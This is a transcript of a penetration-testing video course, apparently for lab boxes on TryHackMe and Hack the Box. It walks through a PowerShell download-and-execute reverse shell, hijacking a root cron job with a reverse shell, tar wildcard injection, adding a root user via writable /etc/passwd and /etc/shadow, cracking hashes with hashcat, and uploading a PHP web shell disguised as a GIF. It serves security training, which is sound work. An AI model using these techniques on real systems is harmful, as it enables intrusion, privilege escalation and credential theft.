open, you can think evil WinRM, and it is one that I really like to use. So if I see those ports and I get credentials, this is where I go. And so when it opens, we'll actually go ahead and go to a place where we can write to. We'll go to the desktop, and if we go ahead and ls or dir, because we're able to use ls on here, we can go ahead and press ls or type in ls or dir, either way, and here's your user text. But watch how easy this is to upload a file. So we're in this desktop Windows, and over here we have these files, these text files. We can go ahead and type in upload, and then we'll type in test.txt, and it will upload for us this file. And watch how easy this is. See how simple that is to upload a file? If this was something that we needed to get privilege escalation on, we can upload a file simply. We can upload WinPs, or we can upload some other form of enumeration, some other tool for enumeration, and it just goes really simple. It's really easy to move files about. And then also if we are running like Bloodhound or something where we need to get files off of the Windows machine onto our Kali machine, it is also really simple. You can just type in download, and then you can type in the file over here, and it will go ahead and download that file for us, and it'll go straight into our Kali folder over here. And it is really my go-to if I have the option to use Evil WinRM, and so I would highly suggest downloading it and looking to use it. And we're actually going to use it in future boxes, so we're going to get to see exactly how to use this when it comes to some of our Active Directory boxes, because I like using Evil WinRM when I have to get files off of a Windows machine. And so with that, we will continue on in the next video. Okay, we're going to be going over a few ways to transfer files over to our Windows machine. And one way to go about this is to just go ahead and execute a file with PowerShell. So what we would do is we would come over here to our place where the file is located. We'll host it up with a simple server, and then we would put in PowerShell -c IEX and then the rest of this, and what happens is this will actually execute the file rather than download it over here to the server. So this will only be one that we use when we have a malicious exploit and payload that we really want to run, and we don't necessarily need to move it. And we will see this over and over and over. I would recommend just putting this right here on a flashcard and memorizing it, because it'll be really helpful in the future. So this is one that we're going to see again later. So what happens is it uses PowerShell to go ahead and execute this command, and it will grab this file, and then it will actually just go ahead and execute it. So this is one that's going to be really common for us to use on web servers. So if we need to just execute something and we have a netcat listener, say we have it over here, where we would be hosting up the file here, and if we executed it, say in this web browser, this command right here, like this, what would happen is ASPX, I messed that up. What would happen is it would come over here, the server would run PowerShell, and then it would run this command. It'll go to our listening over here where we're hosting up the file. It'll come over where we're hosting this up, and then it will grab the file, and then it will execute it. And then on our netcat listener, if we had one running over here like this, it would give us a reverse shell over here. So it may seem confusing at this point, but what you need to know is that you need to memorize that, and you're actually going to see this later on. I just wanted to show it now so that way you're not caught off guard, like, hey, what is this? I haven't seen it before. So what we do is we would run it, and I don't know if it'll actually reach out. No, it's not going to. That is the command. We're going to go and see another one that this command should run on, and so we'll run it on the next box, but there's going to be a little more to the next one because we're going to be using Evil WinRM, which has a very simple way to transfer files. So I'll see you in the next lesson. Okay, the next version of file sharing we're going to use is going to be from InPacket, and it is going to use the SMB server. And so what you'll need to do is type in sudo apt install python 3 InPacket, and this is something you need to install. You're going to use it a lot. There's a lot of InPacket tools that we're going to use. There are a lot of penetration testers that would say if there's anything that they want to take with them, if there's only one group of tools they can have, it would be these InPacket tools. We're going to use them in Active Directory. We're going to use them in just basic enumeration. These are really useful. You're going to want to download these, and we're going to use it now for a file transfer. This is kind of my last resort for file transferring because I don't actually, it's not actually that easy. So what we have to do is we have to start a server. And so what we'll do is go in and type in impacket SMB server. You'll make up a username. I made my username D and the password D. We're going to share all. And so you can go ahead and type this out and pause the video. Once you're done with that, you will hit enter, and now we are sharing all of the files within this directory here. So we'll come back over here, and in order to get access to this, we're going to type in netuse // and then our IP address 1415, and then we're going to type in the share name, and then we're going to type in / and then our user, and then the password that we're using. We'll go ahead and hit enter. It says the command was completed and successful. So now in order to get to those files, we're going to cd // actually, you know what, I'm just going to copy this because I don't really want to type it again. We're going to cd to that location. And now we are here. Now we have access to those files. And if, let's say we had an exe file or some kind of payload that we want to run, maybe winpeas.exe, what you would do is you would just type in / and then file.exe here, and then it'll go ahead and run it. So for example, we're going to give it the command type test.txt, and it should go out to our server and return what's in there. So we can actually go, like, I have 3 test files to show you that there's 3 different things here within this file. So we'll go ahead and shut this down, and I'll show you. See, we have test.txt, test2, and so we can actually just cat test2, and you can see what's inside the file and that it has access to it. This is my least favorite way to share files, but it is an option that you need to be aware of because I have had to resort to this in the past. So with that, we are going to continue on. Okay, we are going to be starting the Windows privilege escalation portion of this course. I want to go over a couple of helpful websites, good resources that you should have. I would save them, I'd bookmark them. I have them bookmarked. And I'll tell you, my favorite is this one right here. It is the Shusant 747 guide, and so you can come to Windows or basic Windows, and you can come through here, and it's going to give you commands. These guys are my go-to, but there's a couple of others that we can use. So this is a good one, and you can actually see, you can go PowerShell, and you can look at other versions of or other ways to search for information or possible exploits. You can come over to Hack Tricks. These guys are another really good resource. I shouldn't say this is the one I go to the most because I do come here a lot also. These guys are really helpful. They're helpful when you're doing a Linux box as well. And so we'll get into some of these commands and what they do and how we use them. And we're going to find that these guys can be really useful, really helpful whenever we're going through privilege escalation. And some of the stuff we're going to do is going to be me literally, I'll tell you when I'm doing this, but it's going to be me coming over here, copying and pasting, and you're going to get to see privilege escalation side of things. There are tools that do a lot of what we see here. We'll actually run through this, and all we have to do is go through and read the output that the tool runs, but sometimes that is not going to work. Sometimes we'll try to run WinPeas and it will not work, and I've spent a lot of time wasted trying to get tools to run when I could have just manually run through some of the scripts here and saved a lot of time. So it's helpful to know to come here and to be able to see these. So this is the second one. You don't have to worry about trying to type this out. I'll have it linked in the course resources. And then we also have payloads, all the things. This is a really good website as well because they have Windows privilege escalation. We've used these guys before. They have a lot of helpful scripts beyond just Windows escalation, privilege escalation. So this is another one, and they'll tell you user enumeration. This is a great one to go to. Just copy, paste, and it will tell you who you are and the privileges you have. And one of the famous ones for having run this is, I think it's SE privilege token impersonation. Now I can't remember. This is one you run, tells you, this will tell you what groups you're a part of, this will tell you what privileges you have, and this will tell you the users. And so there's a lot of helpful scripts in here. You can literally just go through and copy paste these straight in and do enumeration. So these guys really helpful, and one that I would also recommend. This is another one. I will admit that this is one that I do not really use, so I would recommend you looking over it and seeing if you would like to use it. See, they actually give the example of the output rather than just the command, and so you can use these guys if you want. It's pretty much all the same command. They only have screenshots of the output as well. So with that, we'll go ahead and continue on in this course. I'll see you in the next video. Things to be aware of. I already mentioned the IP config, so we'll go ahead and go IP config. Another one to check is the route print. This will tell us our route. It will also tell us up here if there's any other boxes connected to this one that maybe we're in an Active Directory environment, or there's another machine inside of the network that is not connected to the outside network, but it is connected to this one, which is connected to the outside network that we have access to. We can set up proxy chains, or we can try and figure out how we can connect that other box that is within the internal network and see if we can get some information from. So it might sound a little daunting right now. It's really not as difficult as it sounds, but the route print is one to look out and see if there's anything in here that looks interesting, or any other machines talking to this one that we don't have access to. So the route print and the IP config, it's the IP config /all is also a helpful one to run and to look at and see if there's anything interesting in here. We also have arp-a is one to run. Just gives us more information here about what this box is communicating to and how it is set up. And then one that's also really helpful is netstat-ano. And this will be helpful because it'll tell us what ports are listening and which ones are open, so we can go ahead and we can see these. And maybe there are some of these ports that we weren't able to access through our nmap scan, and we'll want to see, okay, let's say this port, we weren't able to access it. Well, what is it doing? Why is it listening? Is the box connected to a port out there that we weren't able to access? And if it has a port open and established, one of our goals is to try and figure out why and to set up a port forward and see if we can gain access to that port and see if we can enumerate it. This is going to be something that you're going to face in CTFs. It's something you're going to face in certification exams, is you're going to have to learn how to port forward, and you're going to need to get used to running this netstat-ano to see what is out there, especially in Active Directory situations. Looking for other IP addresses that's connected to this box is going to be essential, and then also looking for ports that are connected is going to be essential for us to be able to continue on in our journey. So these commands are ones you should memorize, you should know, you should just run them right away as soon as you get on a box, on a Windows box especially. They're not going to work on Linux, but as soon as you get on a Windows box, you should be running these or thinking, okay, what am I connected to? Who am I? What users are on this box? And is there anything connected on here? And then how do I become one of those high-level users? So with that, we will continue enumerating in the next video. All right, so you've already seen the system info, the who am I's, kind of went through this group here, but one thing we didn't talk about was the firewall. When you come onto a box, you can look to see what firewall you're up against, or if there's several, if it's maybe Windows Defender, if Windows Defender is disabled. or some other kind of firewall. I don't know why. I think Windows Defender is probably the best out there, but sometimes people will disable them and they'll enable other firewalls. And if you find the firewall that you're up against, you can go ahead and copy it and see if you can find what version it is, and go out to Google and see if maybe there are some exploits against those firewalls. So being aware of the firewall is always helpful. But that is not what this video is about. This one is about the password search. So this is something that does happen. It happens regularly in CTFs. It happens in certification exams. You are going to come up against a stored credential, and you will be able to just copy this, paste it right in, and hit enter. Here, nothing comes back, but these are really helpful to run. I have found some others when I was searching for passwords or stored credentials in Google beyond just these. So be aware of that. If you run these and nothing's working, maybe you could go out to Google and type in finding stored credentials on a Windows machine and see if you can find some other one lines that you can go ahead and paste in and see if you can come back with any stored credentials. One other thing to be aware of is that you don't just leave this as password. When you run it, you need to change it to passwd, run it with password. Sometimes you can run key. There's a bunch of different ways you can run this, and if you're really struggling on the box, you can get really creative and just type in PSS and just see what you can find through using these. This is going to go out and search all. That's what this means. This little star is going to search all the text files for the word password. And sometimes it is going to bring down a lot, and you're just going to have to look through those files and see what you can find. One other thing that is worth mentioning, I think I mentioned it before, is whenever you get on a Windows box, you should see if you can access a config file, or a Linux box, you should see if you can access a config file, because a lot of times people will store passwords in those config files. And one more thing to be aware of when you're looking for passwords is the SAM file. And you can go out whenever you're looking for the SAM file. I can never remember where it is, but you can go out to Google and just type in Windows SAM file location, and it'll tell you where the SAM file is. Because if you can get in that SAM file, you can read that SAM file, or you can dump the SAM file. You can get hashes and passwords to users, and then you can use those to access higher privileged users on the box. So be aware of that. Save those in your notes, and remember to look for those when you get onto a Windows machine. And with that, I will see you in the next video. One thing that is helpful beyond just searching in these files here is to come down here, and a really helpful place to search for passwords is right here. Using this, searching in the registry. I have cracked machines with this before in the past. So you just come in here, you can paste this in, and you hit enter, and it will start pulling stuff down. It's going to tell you this reg_sc, and you can begin to look. This is where the passwords will be stored, if there are any stored passwords. These just tell us these are default passwords, and unfortunately I don't see any. I've never actually ran this on this machine before, so I've never actually looked at it. And sometimes this will have passwords and users in here, and it's always one to look at and to see what is in here. It's always one to go ahead and run and check to see if there are any stored passwords in here. So with that, I will see you in the next video. Okay, we're going to be doing some network enumeration in this portion of the course. The first thing we need to be aware of is the system info. And in here we have a lot of useful information. So we get the name, the host name, and the OS version. This is going to be important for, or the OS name, the OS version, this one right here, is going to be important when looking for kernel exploits. We have gone over a few tools that will help us find some of these kernel exploits due to the OS version, but a manual way to do it is to come in here, to take the OS version, to go out, to copy it and put it in Google, and then to read and see if there's any exploits out there. And it's helpful to know what the OS version is, especially when you're trying to run a kernel exploit, because if you're trying to run one
that is newer than the version you're currently going up against, then it's probably not going to work, but it might if there's not any patches. So it's something to be aware of and something to research and to go out and to look and see what you can figure out about the OS version. We also see the name, the registered name of the machine, which I think is also a user on this machine as well. And then we can continue on and we can see the system, we can see the architecture of the machine. This is also important because if you're going to be running WinPs on here, you have to have the right version. Some exploits, so if you're running a kernel exploit, I have come across this before where a kernel exploit is made for, I think it was an x64, and I needed to change it. I couldn't get the exploit to work. And I just was banging my head up against the wall, unable to figure out what was going on. And the issue was I didn't have it set to the right architecture. And it's something to always be aware of. Also, if you're in Metasploit and you're trying to run an exploit, then you need to make sure that you know what the architecture is and make sure that you are using the right exploit set up with the right architecture for that exploit or that privilege escalation to work. And then we can see the domain. If you're on a Windows, if you already have code execution on a Windows machine, this is not as big of a deal, but whenever you're looking for an Active Directory exploit, this is always something to go for and something to look at. And we will cover a little bit more of how to use this in the future, but these are just some things to be aware of and to be on the lookout for when you first get on a box. I usually will run a system info as well as an IP config just to see what is going on within this box. Okay, so with that, we will continue with our network enumeration in the next video. All right, we are going to continue with our network enumeration. When we get onto a box, probably the very first thing I always run is a who am I. It'll tell you if you even need to start looking for a privilege escalation. If it says you are in the authority system, then you know you don't need to worry about privilege escalation. However, in this case, we are not, and it tells us who we are. And then one of the very next things we can run is a who am I /priv, and this will tell us the privileges we have. This is something to check, especially in CTFs or certifications or older boxes, something that hasn't been updated in a while, because one of the popular exploits right here is the potato attacks, and they come through the SE impersonate privilege right here. If it is enabled, you can always come here and try potato attacks and see if you can get these to work. So this who am I /priv is really helpful because you're going to see whether or not this is enabled, the SE impersonate privilege, and if it is, you should be thinking potato attacks. And we're going to cover a little bit of the potato attacks later, but it wouldn't be a bad idea to go out and read about the potato attacks and how they work, because we're not going to cover them really in depth. We're just going to see one of the potato attacks later on in this course, but you're going to see us run the who am I /priv, and then we're going to look at this to see if it's enabled, and then we'll go out and pick one of the potato attacks to run against a box later. So the who am I /priv is always something to look at, and then we have the who am I /groups. This is a helpful one to run, especially on Active Directory, because it'll tell you what group you're a part of. It'll tell you what groups there are, and you can also run a net user, and you can see the users on the box. And so we have administrator, we have the Babis, and then the guest user. And this will be helpful when you're in Active Directory because you can enumerate users, find out users that you may be able to move to laterally, and eventually try to compromise the domain controller. So the users, or the net users, is really helpful, especially in Active Directory. And so is the groups, because if we are just a low-level user in one of these groups over here, our goal is to get into one of these authority
groups. We want to make it into a high-level user and eventually compromise the domain controller. So in Active Directory, these are going to be really helpful to enumerate users and groups. We're actually going to go ahead and stop this video here, and we'll continue on enumerating the network in the next video. All right, we're going to go over a few Windows privilege escalation tools. These will help us once we have our initial shell and we have a foothold on the box. This first one is kind of old, but it's one that I really like. It's Windows Exploit Suggester. So if you're running an older box, this is one to always run. We're actually going to check this one out pretty quickly. So we'll install it later because it's kind of a little bit of a walkthrough. And then we're going to run it, and we're going to see exactly how this works. It's going to help us find some kernel exploits, and so Windows Exploit Suggester is one that we're going to be going over. We're also going to go over WinPeas. This is one of my favorites when it works, and you will see what I mean when I say when it works, because it doesn't always run. So I really like this tool, but the best place to remember about anything on this page without having to come back and reference this video is to go right here to the release page. This tool is not like WinPeas or like LinPeas. It doesn't just automatically run regularly without any problems. It's going to have the right architecture, and you're going to have the right box to get it to run on. I like to run WinPeas any and hope for the best. But if not, I will check the architecture, pull over the right one, and still try to get it to run. And still, sometimes it won't run, and you'll have to run the WinBat file, the WinPeas bat, and then you can sometimes get that to run, and sometimes WinPeas just doesn't work at all. That's why it's helpful to know the manual enumeration, because sometimes that's what you're going to be stuck with. And these tools are just there to help you get the job done a little quicker, but you still have to know what you're looking at. And then we have JAWS. This is a PowerShell script, and it is going to be another one that we're going to see. It stands for just another Windows enumeration script. This one I don't use as much, but I will use it occasionally. This one, if I'm going to run a PowerShell script, this is the one I usually go for, which is PowerUp. And we're going to see this later on in the course. We're going to pull the PowerUp file over to our Windows box from our Kali machine, and we're going to go ahead and run it and see what comes back. A couple others that are worth mentioning that we are not going to see right away because they're going to be used in the Active Directory portion of the course is Mimikatz. It is one that is going to help us with further enumeration once we're on a Windows box. We might see a couple others, but these are just the ones that I know we're going to see, and to give you a heads up that I have now mentioned them, so when we see them and you hear me say WinPeas or LinPeas, you're going to be able to go, okay, this is a privilege escalation script. It's going to help us figure out how we can escalate this box. Or if I say, let's go ahead and plug this into Windows Exploit Suggester, you're going to know what's going on. We're looking for kernel exploits and how to go from there. So with that, let's go ahead and jump into some kernel exploits. All right, so we are going to be talking about cron jobs. These are files that get executed every 1 minute, every 5 minutes, every day or week. I already went ahead and ran linenum and linpeas, and so here's the output for linenum. And we actually come up here, it actually starts up here, so it'll tell us what files are getting run daily and which ones are hourly and monthly. And then down here, it actually tells us like we have the ability to run this shell bin bash. Well, this isn't bash, this is bin sh here through the home user path. And so this is in our path. We have the ability to write to it, and it'll tell us down here what each one of these stars mean. So you have minute, hour, day, month, or day of week. So we have this right here. These all stars means that it runs every minute, every hour, and so on and so forth. So both of these files here. So this one is going to be in a path, and this one is just a file. So we should be able to
find the location of this file and then just overwrite it and be able to get a reverse shell through this because it's being run as root. And so when root runs a file and we put in a reverse shell, when root runs the file, we'll be able to set up a listener and root will reach out and we'll be able to get a reverse shell on another tab. So that is lin enum. We can come down to linps right here and we can actually see it lights it up for us. It says this path right here is vulnerable. These are being run as root and it's happening all the time. Every minute we have the opportunity to overwrite this file. So what we'll do is we'll see if we can find this file location. So we'll go locate and then we'll paste and we'll type enter and it tells us that the file is right here. So we should be able to just go to nano and then paste this in. And this is what is being run right here. So it says bin bash and then it's just echoing the date and then it's going into nowhere. So we can actually just come in here and we could leave that actually. I was gonna say we could delete it or we could leave it. And what we want to do is put a reverse shell in here. So I shared this with you earlier. This is a place to go, Pentest Monkey, and you can get reverse shells. We can just come in here because this is running a bash script or a bin sh script is a bash. Bin bash, you can come in here and you can paste in this bash script and we'll go ahead and use the famous port 4444. Got one too many there. And then we just put in our IP address. And I think mine is 10.242.96. And so that looks okay. Come over here, we will set up a netcat listener on port 4444. And we will go ahead and save this out. And when it is executed, we will get a reverse shell over here. So we'll go ahead and wait for this to reach back to us and I will restart the video. It shouldn't be more than a minute. Okay, and it has reached back out and we have our root shell. So what happens essentially one more time is the server is going through and it is running these jobs every week, every month, every hour, and these ones every minute. And so because this is being run every minute or every 5 minutes, if you ever are doing a capture the flag or a certification or really any box and you see every minute or 5 minutes, you can be thinking this is probably going to be your way in, especially if linps lights it up for you. So what happens is this is being run as root, and when root runs this file and it runs our reverse shell right here, we'll go ahead and open this back up. When it runs this, essentially what it's saying is root wants to reach out to this IP address on this port and offer up a shell, a bash shell. And so when this happens, we come over here and we have this shell come through, and it comes through as root because root executed our file. And with that, we'll see you in the next cron job video. All right, the next video is going to be covering the cron job wildcards, and these are ones that I see a whole lot less, but it is one that you should be aware of nonetheless. And one helpful tool that I forgot to mention to you guys, it'll be linked over in the course resources of this video, is right here, GTFO bins. So you can just delete this and save GTFO bins. It is a really helpful place to go, especially when you're trying to do privilege escalation. And in this specific one, it actually tells us that we can break out of a restricted environment by spawning an interactive shell. And so we saw from our linps and our lin enum that we have this file running right here. And so what we can do is actually come in here, we can copy this. I'd have a space there at the end. We can copy this and we can cat this out. so we can see what's going on. And this is where I come up with the tar so that we can go and check this out on GTF opens, and it will actually tell us what we need to run in order to get this to work. So what we're going to do is we are going to come back here, and we're going to need a reverse shell payload. So one of the things that I have showed you earlier is when we make these, we make them right here with MSF Venom. And so we can go ahead, and I'll go ahead and run that. So that way we have it. But what you need to know when you are making one of these, and where I got this is right here. We go into our Linux, and because this is a Linux box and we're making it a payload with MSF Venom, we need to just copy this, and then you change your port, you change your IP address, and then you set up the shell you want. But what's different here versus the web payloads is we actually need to have the right architecture. And if you saw, we're running an x64. If you try and run this as an x68, it is not going to work. And the way you find that is by typing in a uname-m. You type in uname-m, and it'll tell us this x86-64. And if you didn't know what this was, you could just copy this, paste it into Google, and it will tell you. But for our sake, we're going to be needing to run x64, not x86. So that's how we come up with the type of payload that we're going to be generating. And I went ahead and already pre-filled out everything so that we would have it. And now what we'll do is we need to transfer this over to our vulnerable server. So we'll come over here. We are in the home directory, and we're going to run a wget, and we're going to run it on my IP address, http //10.2.42 and 96, and then we're going to slash, and we're going to call this shell.elf. And we will need to start up a server so that we can transfer this file. And we're going to do that with sudo python 2 -m simple http server. And we're going to put that on port 80. And we're going to type in the password. And now we have this up and running. We're going to go ahead and get this. And it has grabbed it. And so what we'll need to do now is make this executable, and we need to do that with a chmod, and then we can go +x, and then we can just type in the payload right there. And now what we also are going to have to do is we're going to have to make a checkpoint for the server to know where to look in the path for this file. So we'll go touch, and then we're going to /home user, and then we'll go -- checkpoint equals 1. Make sure that looks right. It does. And then we'll go touch /home /user checkpoint. Spelled that wrong. Checkpoint /action equals, and this is to execute our file, and that looks okay. So now what we're going to do is we're going to have to come back over here. We'll close out of that. We can set up the netcat listener that we had running earlier on port 444, because that's the port we set it up on. And now this should execute, and I'll bring you back whenever it has, it already has come back. And there is our shell. That is the cron job wildcard. It's a little confusing, but just watch this a few times, and then maybe we'll practice it later on in this course, and it won't be so confusing. And with that, I'll see you in the next lecture. Okay, so we're going to go ahead and cover the etc shadow weak file permissions as well as the etc passwd in this one video, because it's basically going to be the same exploit with just a little different way of generating a new password. Because we have the ability to edit these files, we can just go ahead and put in our own password, and then we can use that password to log in or switch users. So what we'll do is we can go ahead and we can nano our Etsy shadow file. So we'll go nano, and then we'll go Etsy shadow, and then it gives us the opportunity to come in here and edit these files. So what we'll do is we can, since we already have this copied and saved, we can go ahead and delete this, and just know that in a real live pen test, you would never do this ever. You would never delete this password. You might make a backup of the Etsy shadow, then edit it, and just so you have that there. But I would just make a new user, which we're going to do here in a second. So we've now deleted that, and so what we'll do is we can come over here and we can type in make pass WD, and because we saw the version we're using is the SHA-512, we're going to go im, and then we're going to go SHA, and then it is going to be 512, and then you can type in whatever you want here. So we'll just type in pass, and then we can hit enter, and now it has generated for us a new password. So what we'll do is we'll copy this, and we're going to come back over here and we're going to paste it in, and now we have now changed this password. So we can exit this and we will save it, and we're going to close out of here. And now what we can do is we can go ahead and switch users to root. We can type in our new pass, and we are now root. Okay, so that's one way to go about this. The other way to go about it is you can actually edit the Etsy pass WD file. So we can nano, basically the same thing we just did, Etsy pass WD, and we're going to do this one a little different. So what we're going to do is we're not going to try and put a password in here. What we'll do is we'll just copy this. This is how I would actually go about doing this, and then you can come down here and you can paste this in. And rather than edit this, what you'll see is like best practice is people will copy this entire file, they'll save it as a backup, and then they'll make a second pass WD file and they'll put it in this location, and then they'll edit it, and then after the evaluation's over, they'll delete the Etsy password that they have made, their file that they've made, and then they'll just switch the backup back to the original, and then you don't have any extra users hanging out, you don't have anything messed up, and everything is exactly how it's supposed to be. So that's kind of just a heads up on different ways you're going to see this done. So we'll come back in here, and to make an Etsy pass WD password, what you'll do is you'll go open SSL pass WD, and then we're going to change the password. We'll actually change it here to password. I don't know. We'll change it to password 7. So we'll go ahead and generate this, and this is going to be our new password. We'll come back over here, and we're going to need to change the name of root to root2 because we already have a root user, and where this X is, we're going to paste in our new password, and we're going to do the same thing. We're going to hit Control X, we're going to save it, and then we're going to go ahead and hit enter, and then we're going to go switch users to root 2, which is the new one, to the new one we made. I'm not sure why that didn't work. Oh, I put the 2 in the wrong spot. Okay, well, we'll go ahead and leave that, and we'll go switch users to root 2 like that, and then we're going to type in password 7, and we are now the root user. So this is how you take advantage of weak file permissions. You will see these in the future. They're not super uncommon in CTFs, and so just be aware of that. And sometimes you will have a user in a live situation that does have access to these files, and this is how you're going to go ahead and take advantage of them. If this has been a little confusing to you, don't worry about that too much. We are going to have the opportunity here at the end of this section, after we cover the SUID privilege escalation, to practice this exact technique in editing the Etsy Pass WD file. And so we're going to have the opportunity for you to get hands-on within Hack the Box under the box named Bank, and you will be able to practice this. If you're too excited to practice this, you can go ahead and launch the box bank on Hack the Box and you can skip forward and practice this, or you can go ahead and continue on with the next video. Okay, so I have gone ahead and ran lin enum and lin peas on our practice box here in Try Hack Me. And what we're going to do now is we're going to go ahead and look at the Etsy file and the Etsy shadow files. And what these are the files that contain the users and the passwords. So on lin enum, it looks like this, and we have the password file here, and I think below this is the shadow file. Yes, and it says we can read this file. We should not be able to read this really ever, and usually you're not going to be able to. Even in CTFs, you're not going to be able to read this, only if it's really easy. But occasionally you'll be able to see the Etsy passwd file, but you won't be able to edit it. Lin enum doesn't tell us whether or not we can edit this file. It just says here you can read it. But if you go to and run linpeas, which is the tool I usually go to, it's usually my go-to, it does tell us right here. It says interesting files owned by me or writable to everyone. So this is writable to everyone, and then it tells us right here this Etsy passwd, which is not supposed to be writable to us, so we can go ahead and write to this file if we want to, and we are going to get there. We're just not going to tackle that right at this second. So with this, we know that we can read these files, and where did you go? We can read these files, and we are able to edit them. So what we're going to do first is we're going to go ahead and we're going to try and crack the password, since we can read the hash here for the root password. And so if you remember with hashcat, what you do, we're going to use hashcat, but what we're going to do is we're going to go ahead and copy everything in between this colon and this colon. So we'll go ahead and copy that, and we're going to go ahead and move over to our tools. Okay, so you can move into your tools, or you can go ahead and make a new directory, and we'll make a new directory and we'll just call it cracking, and then we'll cd into cracking. And then what we're going to use as our word list is a word list. We're going to go locate rocku.txt, and it's right here. And so for you to unzip this, what you're going to have to do is you're going to copy this, you're going to cd over here, and you're going to paste, and you're going to hit enter. We'll go ahead, and we don't need the whole thing, we need just this. Actually, we'll just up arrow and delete it. So what you're going to do is you're going to come over here to your word list. If you ls, I've already unzipped this file, but you're going to need to unzip it anyway. And what you're going to have to do is, oh, my bad. It already took me over there. So I already have it unzipped here, but you're going to have to go ahead and cd to wherever you have it, to wherever you have this gz file. And you're going to have to unzip it, and you're going to run this right here. You'll have to run sudo g zip -d, and then it'll be rocku.txt.gz. And so wherever this file is located, and you'll have to unzip it, and then you're going to copy it over to your file wherever you want to keep it. So we'll go and cd into this crack. Oh, it's not in the desktop. cd ... cd cracking. So in here, and then you can go ahead and copy wherever you have that file. So I actually have it stored in my tools, cd desktop tools, and right here I have this file right here. So that is going to have our passwords that we're going to be running hashcat with. It's going to be our word list. And one thing else that we'll need, that I got sidetracked, we'll copy this hash, and we're going to come over here and we'll gedit hash.txt. and then you're just going to enter, and you're going to paste it in here. Now, the way we're going to crack this is going to be with hashcat. And this is what the syntax is going to look like, and I'll just walk through it real quick. This -m is the method you're going to be using to crack it. This is going to be where your hash is located, and this is where your file, your word list, is located. And so hashcat, the way I come up with where this is you look to see this $6 You can copy that, and then I like to go out to Google. I type in hashcat example hash, and then I click on that first one, and then I usually hit command find. I paste this in, okay, or we can go $6, and it will take us to the place where we need to be. I did not use a $6, and then it'll tell us right here 1800. This is what we're going to need to use, and we're going to use some of these other methods later, but we're going to go ahead and run it like this. We'll hit enter, and it will run, and it might take a second, especially if you don't have a lot of extra RAM or CPUs on your computer, because hashcat is pretty intense when it runs. So we'll go ahead and let this run, and I'll bring us back once it has cracked the password. Okay, hashcat has finished running, and it has cracked the password. It is right here. Here's our hash. Here is our password, password 123. So what we'll do is we'll come back over here, and because that was root's password that we cracked, we can come over here and we can switch users to root, and then we'll paste in that password, and we are now root. So that is a weak Etsy shadow file setting, and if you're able to read those hashes, you can crack those passwords. And just so you know, you will find hashes elsewhere beyond that. So hashcat is something you're going to want to know how to run. You can also run John. Maybe we'll use that tool a little later for hash cracking, but that is how we crack a hash that we found in the Etsy shadow, and we're going to continue on looking at how we can exploit these in the coming videos. Alright, we are here at TryHackMe. TryHackMe is a great place to go to practice a lot of your skills. They actually have free courses and free places to practice. We're actually going to come back here for the buffer overflow as well. But this is a great place to go and practice your Windows privilege escalation as well as your Linux privilege escalation. I've decided to come here for the Linux privilege escalation because we can pretty much do everything in one place, and we can look at some of these scans and we can see just exactly how this is going to work. So we're going to walk through quite a few of these just so you get an idea. Linux privilege escalation, in my opinion, is easier than Windows, but there are those who I highly respect who are very great penetration testers who disagree with me and say Windows escalation is way easier and it is their favorite. So I guess that it's just preference, but we'll go ahead and we're going to look at a couple of different tools. So the first one I want to show you is going to be LinPeas. So this is a brother to, or sister, however you want to look at it, to WinPeas. So we'll just Google LinPeas, and it'll bring you to this page. It'll be the first one. So LinPeas right here on GitHub, and it's the same as before. What you do is you're going to scroll down, and you're going to go to the release page. You'll click on this. I just grabbed the first one, so just click on this. You can click download, and it will save to your downloads, and then what you'll do is you can just move it from your downloads by typing in copy and then the location, which is going to be your home. So it'd look like this. If I wanted to copy it to my desktop, I would go copy, home, the machine, the downloads, and then the file, which is LinPeas, and then I just put period to copy it to my current directory. Or if I wanted to copy it to a different location, I would put the full path in there as well. And so you'll go ahead and copy that to your tools folder, which I have already gone ahead and done. It is right here. And so you'll want that there. And then the other one we want is lin enum. And we're going to look at lin enum. I don't use this really that often, but I like to have it. And it's one I want to show because it's not going to highlight things for us, and it'll be easier for us to walk through what we're looking at without linps just giving us all of the answers. So we're going to go ahead and grab lin enum as well. You'll go ahead and you'll just type in, I typed straight into the URL, but this is the URL where you're going to go. You'll just go ahead and type in lin enum, and then you can type in this right here, and it'll pull you up this this GitHub page. So you're going to want to go ahead and click linenum.sh. You can right click it and go copy link location, or you can come in here and save things the way I do. I go into raw, I highlight it all with Command A, I copy with Command C, and then I gedit a page over here, and then I paste it in. And so that's how you're going to get those. And then we're going to go back over to Try Hack Me, and we're going to SSH into this box. I'll have already done that, and we will begin looking at some of the privilege escalation ways in Linux. All right, we are going to go ahead and shoot the Etsy PassWD video. I decided to go ahead and make this video because I was kind of having a little bit of trouble with it myself, getting it to actually load. So I wanted to walk you through exactly how to go ahead and get that done. And also, while we're here, if you remember, the way we uploaded this file was we went ahead and put something in here, put something in here. We chose a file, and then we did a GIF, and then we just saved those first few characters and then put in our web shell right here. So I actually decided to go ahead and show you another way to do this. You can actually, is way faster too. You can make your own file just like this. We'll go ahead and we'll cat this out. We just need the GIF 87A and then the web shell. And we just saved it as HTB, so that way it would execute the PHP code. If you remember the note we found inside the box, a little clue. And now we don't have to mess with repeater. We don't have to put this inside burp. We don't have to delete those characters. We can just upload this straight away. So we can just choose this file and upload it and submit. And it goes right through, and we can come over here and we can type in cmd, who am I? And we get www data. So we can go ahead and delete this and upload our netcat shell for this. And I guess we'll just delete all that. Go 10, 14, 15, or we'll just make it 1, 2, 3. And then we need to set up our netcat listener so that we can get a callback on our box here. We'll go ahead and hit enter. Not sure what went wrong. Just try it again. 10, 10, 14, 15. Let's go ahead and send that. That time it looks like it's hanging. If you remember, we need to type in python-c import pty.spawn and whoops. We'll need bin bash and then close all this out. Looks good. And now if you remember, we need to come over here and we hit Command Z to put that in the background. And then we type in stty raw -echo and then the FG, and then we'll hit enter, and then we'll hit enter again. And that's very important to getting this to work, because without that, I really was struggling to edit the Etsy PassWD file. So what we'll do is we'll go ahead and we'll cat the Etsy PassWD. We are going to copy all of this so that way we have it, just so that way we are used to having this in best practice, just in case we screw it up, we have it here. And we can save it right here. We'll go gedit, and we can type in, we'll just save it as PassWD, paste that in there. And we're going to go ahead and copy this root, and we're going to make a new one, hit enter. And if you remember, we need something to go right there, our new password. So we'll come back over here. We type in open SSL, passwd, password is pass, hit enter. It gives us a new password, we copy it, we replace it with this X. We're going to copy this, copy. Okay, now here comes the tricky part. We're going to go ahead and do vim, and we're going to go Etsy pass WD, hit enter, and we're going to go ahead and, because I don't really care to mess this up too much because it's just a regular practice box, we can come up here, we can hit enter. We're going to paste in our new box, our new user, and you can see nothing showed up here except for this T. So what actually ends up happening is we need to hit escape in order to close out, and then we put our colon 